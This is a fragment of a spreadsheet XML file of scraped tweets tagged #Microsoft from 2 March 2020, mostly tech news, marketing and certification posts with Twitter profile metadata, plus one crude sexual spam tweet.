    <t>{'id': 33951198, 'id_str': '33951198', 'name': 'Courtney Troutman and Emily Worley', 'screen_name': 'SCBar_PMAP', 'location': 'South Carolina', 'description': '#Law #PracticeManagement &amp; #Technology #Tips\n#SouthCarolina\n#SouthCarolinaBar #SouthCarolinaBarPMAP', 'url': 'http://t.co/GhMl8fUTCs', 'entities': {'url': {'urls': [{'url': 'http://t.co/GhMl8fUTCs', 'expanded_url': 'http://www.scsmallfirm.com', 'display_url': 'scsmallfirm.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1031, 'friends_count': 360, 'listed_count': 83, 'created_at': 'Tue Apr 21 16:15:33 +0000 2009', 'favourites_count': 579, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 4939, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '000808', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/935922608675213312/nYmQqoJm_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/935922608675213312/nYmQqoJm_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/33951198/1516311145', 'profile_link_color': '0084B4', 'profile_sidebar_border_color': '353635', 'profile_sidebar_fill_color': 'D4D9D2', 'profile_text_color': '333333', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Mon Mar 02 18:00:45 +0000 2020</t>
  </si>
  <si>
    <t>Catch us this Thursday at @Vox_ISM's FPAC event where we will be teaching #Manufacturers the #Financial and operational impacts of system #Integration: https://t.co/x6xyKyntpv
#Toronto #Manufacturing #Microsoft #Automation #LdnOnt</t>
  </si>
  <si>
    <t>Mon Mar 02 18:00:39 +0000 2020</t>
  </si>
  <si>
    <t>The Power BI ""Triple A"" Event Videos Are Now Live! 
https://t.co/scTfpM67ht
#Microsoft #PowerBI #DataAnalytics</t>
  </si>
  <si>
    <t>Mon Mar 02 18:00:33 +0000 2020</t>
  </si>
  <si>
    <t>TO TRISTE!
#teammg #marriedgames #games #gaming #game #jogos #jogo #pc #console #computador #playstation #ps4 #xbox #xboxone #xboxonex #sony #microsoft #switch #nintendo #nintendogames #nintendoswitch #gamer https://t.co/2f8a3J9WJL</t>
  </si>
  <si>
    <t>Mon Mar 02 18:00:02 +0000 2020</t>
  </si>
  <si>
    <t>.@Gartner_inc has named #Microsoft a Magic Quadrant Leader among analytics and BI platforms for the thirteenth year in a row. Read the blog: https://t.co/YSw4Bn7hOd</t>
  </si>
  <si>
    <t>Mon Mar 02 18:00:01 +0000 2020</t>
  </si>
  <si>
    <t>Get the latest in #Microsoft365 and #SharePoint in this week's #PnPWeekly via Microsoft! https://t.co/jBFrHcTbqZ
#microsoft #office365 #sharepointonline #pnp https://t.co/2nSSyCL357</t>
  </si>
  <si>
    <t>Mon Mar 02 17:58:47 +0000 2020</t>
  </si>
  <si>
    <t>Check out my latest course: Overview and Preparation for #Microsoft Certification Exam AZ-900: #Azure Fundamentals, designed for managers, directors, and #IT professionals who plan on taking the #AZ900 certification exam. https://t.co/2P6fDb2MWd https://t.co/FSC8ERKPwx</t>
  </si>
  <si>
    <t>{'id': 1141090069211746304, 'id_str': '1141090069211746304', 'name': 'Tracy Wallace', 'screen_name': 'TracyWallaceINE', 'location': 'Cary, NC', 'description': 'Dad, husband, trainer, developer, IT architect.  Wannabe maker.', 'url': 'https://t.co/qXSy3swP51', 'entities': {'url': {'urls': [{'url': 'https://t.co/qXSy3swP51', 'expanded_url': 'https://ine.com', 'display_url': 'ine.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 114, 'friends_count': 139, 'listed_count': 0, 'created_at': 'Tue Jun 18 21:07:27 +0000 2019', 'favourites_count': 550, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 250, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1141090281045012480/SMNB0ySO_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1141090281045012480/SMNB0ySO_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1141090069211746304/1569434650',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</si>
  <si>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17:55:42 +0000 2020</t>
  </si>
  <si>
    <t>Which of the Big Three comes out on top throughout the different console generations? https://t.co/ryC9lcZZD2 #gaming #tech #technology #videogames #bigthree #games #start #blog #console #sony #microsoft #nintendo #nintendoswitch #ps5 #xboxseriesx #ps4 #xboxone https://t.co/zcP249UPlQ</t>
  </si>
  <si>
    <t>{'id': 497458983, 'id_str': '497458983', 'name': 'Fred Payne', 'screen_name': 'FredPayne24', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 7, 'friends_count': 21, 'listed_count': 0, 'created_at': 'Mon Feb 20 01:03:22 +0000 2012', 'favourites_count': 13, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 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</si>
  <si>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Mon Mar 02 17:55:08 +0000 2020</t>
  </si>
  <si>
    <t>Mon Mar 02 17:51:49 +0000 2020</t>
  </si>
  <si>
    <t>Wohooo! All Sessions and Experts for @ExpertsLiveCH are online now and ticket sales in on! Wait, one session is missing: The keynote! We will unveil this secret later! Get your seat now and join the #Swiss #Microsoft #community! https://t.co/M7ipiPizRr #ExpertsLiveCH #ExpertsLive https://t.co/0czZ1xFHrW</t>
  </si>
  <si>
    <t>{'id': 325752305, 'id_str': '325752305', 'name': 'Marcel Zehner | MVP', 'screen_name': 'marcelzehner', 'location': 'Bern/Switzerland', 'description': 'Microsoft Azure MVP / Partner at make it noble, districtUP, Experts Live EU and CH / Community &amp; cloud champion / Father of 2 &amp; husband to a lovely lady', 'url': 'https://t.co/qezgItmYTF', 'entities': {'url': {'urls': [{'url': 'https://t.co/qezgItmYTF', 'expanded_url': 'http://marcelzehner.ch', 'display_url': 'marcelzehner.ch', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3480, 'friends_count': 1468, 'listed_count': 134, 'created_at': 'Tue Jun 28 20:20:14 +0000 2011', 'favourites_count': 3040, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 4144,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'http://pbs.twimg.com/profile_images/1084713086718803968/sU7hZQGo_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1084713086718803968/sU7hZQGo_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/325752305/1550209516',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</si>
  <si>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17:51:29 +0000 2020</t>
  </si>
  <si>
    <t>via #Citrix Blogs: "Whats new with Citrix Workspace  February 2020: " https://t.co/Ll06jiNZsV
.
.
.
#blog #virtualization #cloudcomputing #cloud #security #microsoft #azure #citrix #citrixishow</t>
  </si>
  <si>
    <t>Mon Mar 02 17:51:07 +0000 2020</t>
  </si>
  <si>
    <t>@Microsoft looks to give Yammer a new lease of life; can it? . #Microsoft #Yammer #Tech #Communities #STEM via @Computerworld https://t.co/xkAO3Yx4f0</t>
  </si>
  <si>
    <t>Mon Mar 02 17:50:08 +0000 2020</t>
  </si>
  <si>
    <t>Vatican joins IBM, Microsoft to call for facial recognition regulation https://t.co/cgto7SlGJy #ai #ArtificialInteligence #MachineLearning #FacialRecognition #Vatican #microsoft #ibm #regulation https://t.co/1hiJ0bWoZM</t>
  </si>
  <si>
    <t>Mon Mar 02 17:49:52 +0000 2020</t>
  </si>
  <si>
    <t>[From the Blog] Application Security Group assignment using PowerShell 
#microsoft #azure #azurefamily 
https://t.co/RouPagFsJt</t>
  </si>
  <si>
    <t>Mon Mar 02 17:47:33 +0000 2020</t>
  </si>
  <si>
    <t>Your dick would look better between my ass chicks !  #USA   #microsoft #teaching https://t.co/UiggcnbHKU</t>
  </si>
  <si>
    <t>{'id': 1234240548824866817, 'id_str': '1234240548824866817', 'name': 'Shannon Hill', 'screen_name': 'diacreamingie', 'location': 'Yonkers, USA', 'description': 'A flower cannot blossom without sunshine, and man cannot live without love', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 5, 'friends_count': 36, 'listed_count': 0, 'created_at': 'Sun Mar 01 22:14:18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'http://pbs.twimg.com/profile_images/1234243274220679168/x7igYA2g_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1234243274220679168/x7igYA2g_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1234240548824866817/1583101544',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</si>
  <si>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17:47:02 +0000 2020</t>
  </si>
  <si>
    <t>Is it worth switching to Office 365?  We certainly think so! 
Check out the pros and cons for making the switch... 
https://t.co/IMl2GrMpgy
#Office365 #Microsoft</t>
  </si>
  <si>
    <t>{'id': 281948675, 'id_str': '281948675', 'name': 'CETSAT', 'screen_name': 'cetsat', 'location': 'South West &amp; London', 'description': 'From security and support to connectivity and cloud computing, weâ€™re committed to providing the very best support and agile solutions. #GDPR #MSP #cyber', 'url': 'https://t.co/ENDxHyajnV', 'entities': {'url': {'urls': [{'url': 'https://t.co/ENDxHyajnV', 'expanded_url': 'http://cetsat.com', 'display_url': 'cetsat.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1539, 'friends_count': 2074, 'listed_count': 63, 'created_at': 'Thu Apr 14 08:52:56 +0000 2011', 'favourites_count': 5614, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 5330,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'http://pbs.twimg.com/profile_images/935209882239807488/aZHDFl-F_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/935209882239807488/aZHDFl-F_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/281948675/1511957389',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</si>
  <si>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17:45:03 +0000 2020</t>
  </si>
  <si>
    <t>COVID-19: Microsoft Cancels IoT in Action Event in Melbourne https://t.co/7gSF2PEMH9
via @Gadgets360 #computing #microsoft https://t.co/cbWwzl3Xst</t>
  </si>
  <si>
    <t>Mon Mar 02 17:43:34 +0000 2020</t>
  </si>
  <si>
    <t>A woman can forgive almost everything except inattention to herself #McKinney   #microsoft #generations https://t.co/Ra9Ynxmnio</t>
  </si>
  <si>
    <t>{'id': 1234235224776683520, 'id_str': '1234235224776683520', 'name': 'Danielle Short', 'screen_name': 'bogtifoper', 'location': 'Billings, USA', 'description': 'Without his love I can do nothing, with his love, there is nothing I cannot do.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 1, 'friends_count': 31, 'listed_count': 0, 'created_at': 'Sun Mar 01 21:53:24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'http://pbs.twimg.com/profile_images/1234240016907411457/DA9v7V5p_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1234240016907411457/DA9v7V5p_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1234235224776683520/1583100764',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</si>
  <si>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17:43:32 +0000 2020</t>
  </si>
  <si>
    <t>the endowment of Harvard University keeps dumping Facebook stock but the company is possibly the next Microsoft...#Facebook #microsoft</t>
  </si>
  <si>
    <t>{'id': 1234416362208059393, 'id_str': '1234416362208059393', 'name': 'American Investor Magazine', 'screen_name': 'AmericanInvest4', 'location': '', 'description': '#1 award winning magazine for stocks, ETFs, and investment themes. Gain insights about how America invests.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 5, 'friends_count': 2, 'listed_count': 0, 'created_at': 'Mon Mar 02 09:53:00 +0000 2020', 'favourites_count': 8,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'http://pbs.twimg.com/profile_images/1234416566692917248/vZ5e_ZNz_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1234416566692917248/vZ5e_ZNz_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1234416362208059393/1583236209',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</si>
  <si>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17:42:32 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft #Teams works with config files, so we can make changes at the client-level with few files, such as desktop-config.json, settings.json or storage.json.
https://t.co/CErVMAZKnX</t>
  </si>
  <si>
    <t>{'id': 501045862, 'id_str': '501045862', 'name': 'ES9', 'screen_name': 'EliShlomo', 'location': 'Cloud', 'description': 'InfoSec | DEV | Microsoft MVP | Community Manager | Speaker | Blogger | Mentor', 'url': 'https://t.co/Vk5T9BuGNN', 'entities': {'url': {'urls': [{'url': 'https://t.co/Vk5T9BuGNN', 'expanded_url': 'https://www.eshlomo.us', 'display_url': 'eshlomo.us', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 344, 'friends_count': 99, 'listed_count': 97, 'created_at': 'Thu Feb 23 18:47:54 +0000 2012', 'favourites_count': 3684, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 4102, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '1B95E0', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme4/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme4/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1233315960100151302/qRYzUinK_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1233315960100151302/qRYzUinK_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/501045862/1582880393', 'profile_link_color': '1B95E0', 'profile_sidebar_border_color': '000000', 'profile_sidebar_fill_color': '95E8EC', 'profile_text_color': '3C3940', 'profile_use_background_image': False, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Mon Mar 02 17:40:06 +0000 2020</t>
  </si>
  <si>
    <t>Ooofff  
#Microsoft sure know how to make us need more controllers than we have pairs of hands to use!  
Need to trade your old one in for a swanky makeover? Bring it in and pop a 10 deposit on one (or both ) of these beauts to guarantee it for launch! 
17.3.20 https://t.co/g02o9jzr3A</t>
  </si>
  <si>
    <t>{'id': 628202054, 'id_str': '628202054', 'name': 'GAME St Austell', 'screen_name': 'GAMEstaustell', 'location': 'St Austell, Cornwall', 'description': 'Tweets direct from the GAME store in St Austell. Latest news and information on games and events happening in store.', 'url': 'https://t.co/9dseonUxBj', 'entities': {'url': {'urls': [{'url': 'https://t.co/9dseonUxBj', 'expanded_url': 'http://www.game.co.uk', 'display_url': 'game.co.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 945, 'friends_count': 527, 'listed_count': 35, 'created_at': 'Fri Jul 06 08:57:09 +0000 2012', 'favourites_count': 1443, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 5026,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'http://pbs.twimg.com/profile_images/1110772160300285952/GssAd_bQ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1110772160300285952/GssAd_bQ_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/628202054/1582519556',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</si>
  <si>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17:37:47 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Announces Date of Sweeping Retirement of MCSA MCSE MCSD Certifications | Global Knowledge https://t.co/homrhgEVdN #microsoft</t>
  </si>
  <si>
    <t>Mon Mar 02 17:36:39 +0000 2020</t>
  </si>
  <si>
    <t>#SAPWeek2020 is here.  Its taken a lot of work behind the scenes, but itll all be worthwhile when we kick things off.  I look forward to presenting to our partners on SAP Embrace and answering a few questions on our panel. #Azure #Microsoft #SAP https://t.co/yRRAEPUlU2</t>
  </si>
  <si>
    <t>Mon Mar 02 17:34:00 +0000 2020</t>
  </si>
  <si>
    <t>Buffalo! Did you see our ad in the latest @BfloBizFirst? As Western New York's top #Microsoft Partner- iV4 has the experience to navigate #cloud migrations and support you once you're there. https://t.co/jcH1RLQaOH https://t.co/6AUlDMVlo5</t>
  </si>
  <si>
    <t>Mon Mar 02 17:32:49 +0000 2020</t>
  </si>
  <si>
    <t>Azure Red Hat OpenShift 4.3 is now in preview https://t.co/G5QVM0x1XJ  #Microsoft #Azure #AzureUpdates</t>
  </si>
  <si>
    <t>Mon Mar 02 17:31:43 +0000 2020</t>
  </si>
  <si>
    <t>Windows 10: Blue screen and more trouble with the latest update #Microsoft #Windows10 https://t.co/u8GgEbHwrH https://t.co/cJj2fxWd0O</t>
  </si>
  <si>
    <t>Mon Mar 02 17:30:53 +0000 2020</t>
  </si>
  <si>
    <t>#GoldPartner #Microsoft #Salesforce use #Prosci framework for #cloudadoption #accelerateadoption engaging leaders and end-users with #adkar - #getcertified in Neuchatel 25.-27.03. register here: https://t.co/MAa555e8y4  (3 training days, 2 overnight stays, meals, all included) https://t.co/fIEc624WpJ</t>
  </si>
  <si>
    <t>Mon Mar 02 17:30:39 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft says Autonomous Vehicles could create 20-100TB of data per day, you're going to need Azure - techAU https://t.co/WPGowJTIWO #ai #ArtificialInteligence #MachineLearning #microsoft #azure #selfdrivingcars https://t.co/JfVAs1NaBh</t>
  </si>
  <si>
    <t>Mon Mar 02 17:30:01 +0000 2020</t>
  </si>
  <si>
    <t>Mon Mar 02 17:30:00 +0000 2020</t>
  </si>
  <si>
    <t>Here's how we manage privileged identities for on-premises and #Azure at Microsoft. #AAD #Microsoft #security #MicrosoftSecurity https://t.co/21NNuYPzOf</t>
  </si>
  <si>
    <t>Mon Mar 02 17:29:01 +0000 2020</t>
  </si>
  <si>
    <t>#SMB #microsoft #cloud      SMBs are hungry for #tech that brings customer data together and helps drive #DigitalTransformation. More, via @smbgroup    #Microsoft #Technology #BusinessAutomation #accounting #MSDyn365 https://t.co/fcB36s9Ybs</t>
  </si>
  <si>
    <t>Mon Mar 02 17:28:53 +0000 2020</t>
  </si>
  <si>
    <t>Its no secret. Azure Data &amp;amp; Analytics can be an incredible conduit for realizing business value. Learn about how the technology ties in with a successful business strategy. https://t.co/HPFFauDV3N #microsoft #mspartner #azure https://t.co/1AdOjk7940</t>
  </si>
  <si>
    <t>{'id': 751134829605822464, 'id_str': '751134829605822464', 'name': 'Quisitive', 'screen_name': 'BeQuisitive', 'location': 'Dallas|Denver|Ottawa|Toronto', 'description': 'Helping enterprises move, operate and innovate in the Microsoft cloud; Microsoft Azure, Dynamics and Office 365.', 'url': 'https://t.co/rPBntBCCZq', 'entities': {'url': {'urls': [{'url': 'https://t.co/rPBntBCCZq', 'expanded_url': 'http://www.quisitive.com', 'display_url': 'quisitive.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 190, 'friends_count': 177, 'listed_count': 9, 'created_at': 'Thu Jul 07 19:24:33 +0000 2016', 'favourites_count': 377, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 462, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1060947349944455168/2D3k6BOU_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1060947349944455168/2D3k6BOU_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/751134829605822464/1536637829',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</si>
  <si>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17:27:20 +0000 2020</t>
  </si>
  <si>
    <t>Announcing Universal Print: a cloud-based print solution https://t.co/yCB3l0JYy1 #Microsoft</t>
  </si>
  <si>
    <t>Manage and deploy Microsoft 365 Apps from partners in the Microsoft 365 admin center https://t.co/Dv9FVTasNT #Microsoft</t>
  </si>
  <si>
    <t>Mon Mar 02 17:25:34 +0000 2020</t>
  </si>
  <si>
    <t>Small cloud configuration mistakes can open up big security risks
https://t.co/rHzOY5tOvy #ilinksystems #ilinkdifference #managedservices #inframanagement #infrastructure #engineering #technology #development #cloud #licensing #azure #microsoft</t>
  </si>
  <si>
    <t>Mon Mar 02 17:25:23 +0000 2020</t>
  </si>
  <si>
    <t>Travel Tips for Trainers: Bring snacks on the plane; don't go hungry when heading out to #Microsoft training workshops https://t.co/laLJEC103b https://t.co/OtovBvedI0</t>
  </si>
  <si>
    <t>Mon Mar 02 17:24:22 +0000 2020</t>
  </si>
  <si>
    <t>#Azure Azure Red Hat OpenShift 4.3 is now in preview https://t.co/sCVxcrffQq #Microsoft</t>
  </si>
  <si>
    <t>Mon Mar 02 17:23:19 +0000 2020</t>
  </si>
  <si>
    <t>Hello,
The new role-based certifications and training
https://t.co/AD69rekKZM Be ready to upgrade!
#Microsoft https://t.co/FpQQJQRnb1</t>
  </si>
  <si>
    <t>{'id': 1214269833157607424, 'id_str': '1214269833157607424', 'name': 'Naji El Kotob', 'screen_name': 'KotobNaji', 'location': 'Beirut - Lebanon', 'description': 'I ðŸ’› Data', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 9, 'friends_count': 68, 'listed_count': 0, 'created_at': 'Mon Jan 06 19:37:57 +0000 2020', 'favourites_count': 128, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 38, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1214270010656481286/WmC2l0H6_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1214270010656481286/WmC2l0H6_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1214269833157607424/1582473176',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</si>
  <si>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17:23:12 +0000 2020</t>
  </si>
  <si>
    <t>Azure Red Hat OpenShift 4.3 is now in preview  https://t.co/URTF611UtP  #azure #microsoft</t>
  </si>
  <si>
    <t>Mon Mar 02 17:22:19 +0000 2020</t>
  </si>
  <si>
    <t>Earn a industry-specific IT certification with ITU Online. No prerequisites or experience required. Work at your own pace.
https://t.co/RlZ9sqT8gv 
#MondayMotivation #mondaythoughts #goals #GetItDone #certification #ITProcess #ITPro #Cisco #Microsoft #CyberSecurity #WeAreITU https://t.co/hSy0vuSsTa</t>
  </si>
  <si>
    <t>{'id': 832548396, 'id_str': '832548396', 'name': 'ITU Online', 'screen_name': 'it_university', 'location': 'NYC, LA, Tampa Bay, London', 'description': 'ITU Online (ITU) is the leader in IT training with over 750,000 students worldwide. Setting the standard for quality education #trainingdomination', 'url': 'https://t.co/a7PkAeZRbv', 'entities': {'url': {'urls': [{'url': 'https://t.co/a7PkAeZRbv', 'expanded_url': 'http://www.ituonline.com', 'display_url': 'ituonline.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 21650, 'friends_count': 5475, 'listed_count': 110, 'created_at': 'Wed Sep 19 04:33:54 +0000 2012', 'favourites_count': 46002, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 4584, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '080808', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1222256978602471424/wyH904rN_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1222256978602471424/wyH904rN_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/832548396/1580243626',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</si>
  <si>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17:22:00 +0000 2020</t>
  </si>
  <si>
    <t>Announcing Universal Print: a cloud-based print solution https://t.co/J2fsdJyd96 #Microsoft #Windows #ITPro</t>
  </si>
  <si>
    <t>Mon Mar 02 17:21:42 +0000 2020</t>
  </si>
  <si>
    <t>Developers have lost hope Microsoft will do the right thing, MSFT urged to make WinUI cross-platform by @TheRegister https://t.co/9Aw2riM7H7 #microsoft via @DotNetKicks</t>
  </si>
  <si>
    <t>Mon Mar 02 17:21:14 +0000 2020</t>
  </si>
  <si>
    <t>Announcing Universal Print: a cloud-based print solution https://t.co/iRW3jau8hk #Windows10 #Microsoft</t>
  </si>
  <si>
    <t>Mon Mar 02 17:21:03 +0000 2020</t>
  </si>
  <si>
    <t>Perseverance and motivation! Follow your dreams!
Are you enjoying your current job? If not consider #microsoft . We have some amazing opportunities! https://t.co/hlkYrOE1Yp</t>
  </si>
  <si>
    <t>Mon Mar 02 17:20:05 +0000 2020</t>
  </si>
  <si>
    <t>#Cortana will soon be removed from the #Microsoft Launcher https://t.co/IEuSt8Leas #TechJunkieNews https://t.co/rcOPqrW0Ix</t>
  </si>
  <si>
    <t>Mon Mar 02 17:19:06 +0000 2020</t>
  </si>
  <si>
    <t>How should You prepare for Microsoft tech set go internship interview? https://t.co/tRxGWfgMrB #Microsoft #Internship https://t.co/5NsIfNCzVw</t>
  </si>
  <si>
    <t>Mon Mar 02 17:19:05 +0000 2020</t>
  </si>
  <si>
    <t>The Brokers at GSIMarkets whould like to inform you that: Microsoft Corp (MSFT) stock rose by 3.3578%! Currently priced at 167.45. https://t.co/TmbeSjmU8x #Microsoft #MSFT #Stocks #Stockprices #GSIMarkets</t>
  </si>
  <si>
    <t>Mon Mar 02 17:19:02 +0000 2020</t>
  </si>
  <si>
    <t>Apply Tags to all of your Azure Resources
 #CLI #DevOps #Microsoft #MicrosoftAzure
https://t.co/C07RW27J2h</t>
  </si>
  <si>
    <t>Mon Mar 02 17:18:59 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft Killing Off MCSA, MCSD and MCSE Certs in June https://t.co/m83jRnLDm2</t>
  </si>
  <si>
    <t>Mon Mar 02 17:17:56 +0000 2020</t>
  </si>
  <si>
    <t>*** Tip of the Day ***
Using MS Azure Dashboard, users can pin different charts and views from Azure Application Insights to create custom dashboards.
Here's how to do it: https://t.co/yKr0Y4AVnb
#Microsoft #AzureDashboard #TechNews #AzureUpdate https://t.co/pMhlACzphM</t>
  </si>
  <si>
    <t>Mon Mar 02 17:17:54 +0000 2020</t>
  </si>
  <si>
    <t>Manage and #deploy #Microsoft 365 Apps from partners in the Microsoft 365 #AdminCenter https://t.co/peWe2MG3m0 #Microsoft #Office #Office365</t>
  </si>
  <si>
    <t>Mon Mar 02 17:17:33 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft Makes #Cortana More Productive for Next Windows 10 Update https://t.co/f0vTYUE7oc #Windows10</t>
  </si>
  <si>
    <t>Mon Mar 02 17:17:31 +0000 2020</t>
  </si>
  <si>
    <t>News from week beginning 24th February includes acquisitions by Cornerstone, Intuit and Freshworks. New partnerships between Clarizen and McAfee. #microsoft https://t.co/miXzOEhbzQ https://t.co/tY9FpayJOq</t>
  </si>
  <si>
    <t>Mon Mar 02 17:16:42 +0000 2020</t>
  </si>
  <si>
    <t xml:space="preserve"> #Azure Updates: Azure Red Hat OpenShift 4.3 is now in preview
#Microsoft #MicrosoftAzure #ITSpecialistPro
https://t.co/ok2ss9zceU</t>
  </si>
  <si>
    <t>Mon Mar 02 17:14:53 +0000 2020</t>
  </si>
  <si>
    <t>Hello March 2020! Start learning today!
https://t.co/RlZ9sqT8gv 
#March2020 #marchmadness2020 #MondayMotivation
#mondaythoughts #InformationTechnology #InformationSecurity #elearning #Certification #ITPro #Careers #TrainingDomination #WeAreITU #Cisco #Microsoft https://t.co/QvqAl3a61P</t>
  </si>
  <si>
    <t>Mon Mar 02 17:14:32 +0000 2020</t>
  </si>
  <si>
    <t>Azure Red Hat OpenShift 4.3 is now in preview  https://t.co/ogaI99qP0g  #Azure #Microsoft #Cloud #azureflashnews</t>
  </si>
  <si>
    <t>Mon Mar 02 17:14:13 +0000 2020</t>
  </si>
  <si>
    <t>Azure Red Hat OpenShift 4.3 is now in preview
- integrated for enhanced security and network segmentation of microservices applications
https://t.co/P5RqjtqtZ7
#Azure #Microsoft #Cloud #OSS #RedHat #OpenShift https://t.co/QMlzwgfmam</t>
  </si>
  <si>
    <t>Mon Mar 02 17:14:01 +0000 2020</t>
  </si>
  <si>
    <t>Thanks for the response if my Scottish Summit blog: https://t.co/m3nCUlAjV2
As well as this on my LinkedIn you'll find solution specific blogs, cloud migration blogs, D365 benefits blogs &amp;amp; videos going through 2020 Release Wave 1, each app has its own video! #MSDyn365 #Microsoft</t>
  </si>
  <si>
    <t>Mon Mar 02 17:13:21 +0000 2020</t>
  </si>
  <si>
    <t>BREAKING NEWS: #Microsoft is retiring 18 certifications and 43 exams in #SQL Server, Windows Server, App Builder, Web Applications and more on 30 June 2020. Our article will tell you what you need to know https://t.co/AOSSiFWVgq https://t.co/p23SDMiUJN</t>
  </si>
  <si>
    <t>Mon Mar 02 17:13:06 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft To Bring #Cortana Changes in Spring Windows 10 Update https://t.co/vD6TSrvsaQ #Windows10</t>
  </si>
  <si>
    <t>Mon Mar 02 17:12:02 +0000 2020</t>
  </si>
  <si>
    <t>Azure Red Hat OpenShift 4.3 is now in preview  https://t.co/ogaI99qP0g   #Azure #Microsoft #Cloud #Roadmap  #azureflashnews</t>
  </si>
  <si>
    <t>Mon Mar 02 17:11:24 +0000 2020</t>
  </si>
  <si>
